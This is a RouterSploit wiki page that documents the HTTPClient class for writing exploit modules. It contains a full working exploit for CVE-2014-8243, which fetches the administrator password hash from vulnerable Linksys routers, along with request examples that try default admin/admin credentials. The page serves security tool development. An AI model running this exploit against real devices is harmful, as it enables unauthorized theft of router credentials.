Skip to content

HTTP Client

Jump to bottom
Marcin Bury edited this page Oct 12, 2018 · 5 revisions

HTTP Client

Example exploit that utilises HTTP communication as a client

import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Linksys SMART WiFi Password Disclosure",
        "description": "Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. "
                       "If target is vulnerable administrator's MD5 passsword is retrieved.",
        "authors": (
            "Sijmen Ruwhof",  # vulnerability discovery
            "0BuRner",  # routersploit module
        ),
        "references": (
            "https://www.kb.cert.org/vuls/id/447516",
            "http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers",
            "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8243",
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8243",
        ),
        "devices": (
            "Linksys EA2700 < Ver.1.1.40 (Build 162751)",
            "Linksys EA3500 < Ver.1.1.40 (Build 162464)",
            "Linksys E4200v2 < Ver.2.1.41 (Build 162351)",
            "Linksys EA4500 < Ver.2.1.41 (Build 162351)",
            "Linksys EA6200 < Ver.1.1.41 (Build 162599)",
            "Linksys EA6300 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6400 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6500 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6700 < Ver.1.1.40 (Build 160989)",
            "Linksys EA6900 < Ver.1.1.42 (Build 161129)",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            response = self.http_request(
                method="GET",
                path="/.htpasswd"
            )
            if response is None:
                print_error("Exploit failed - connection error")
                return

            print_info("Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
            print_success("Hash found:", response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/.htpasswd"
        )

        if response is not None and response.status_code == 200:
            res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text)
            if len(res):
                return True

        return False

HTTPClient methods

HTTPClient.http_request

Params

Param Type Description Required
method str method that should be issued e.g. GET, POST yes
path str path to the resource that should be requested yes
session requests session manager that should be used no, default=requests
kwargs any kwargs arguments passed to request method no

Returns

Type Description
Response Response object

Examples

Retrieving data with GET

response = self.http_request(
    method="GET",
    path="/config.cgi",
)

if response:
    print_info(response.text)

Sending data with POST

data = {
    "login": "admin",
    "password": "admin",
}
response = self.http_request(
    method="POST",
    path="/login.cgi",
    data=data,
)

if response and "login successful" in response.text:
    print_success("Successful authentication!")

Adding Headers

headers = {
    "Content-Type": "text/xml",
    "X-Requested-With": "XMLHttpRequest",
}
data = "<test>TEST</test>"

response = self.http_request(
    method="POST",
    path="/xml.cgi",
    headers=headers,
    data=data,
)

if response:
    print_info(response.text)

Basic Authorization

response = self.http_request(
    method="GET",
    path="/config.cgi",
    auth=("admin", "admin"),
)

if response and response.status_code == 200:
    print_successful("Successful authorization with admin/admin")

Maintaining session (handling cookies)

session = requests.Session()

data = {
    "login": "admin",
    "password": "admin",
}

response = self.http_request(
    method="POST",
    path="/auth.php",
    session=session,
    data=data,
)

if response:
    print_info("All the response cookies are correctly processed and maintained")

HTTPClient.get_target_url

Params

Param Type Description Required
path str path to HTTP server resource no, default=""

Returns

Type Description
str full target url with correct schema: http/https

Example

login_url = self.get_target_url(path="/cgi-bin/chklogin.cgi")
print_info("Please login at: {}".format(login_url))

HTTPClient.http_test_connect

Params

  • None

Returns

Type Description
bool True if test connection was successful, False otherwise

Example

if self.http_test_connect():
    print_status("Remote HTTP server is listening")

General

Usage

Contribution

Module Development

Communication

Clone this wiki locally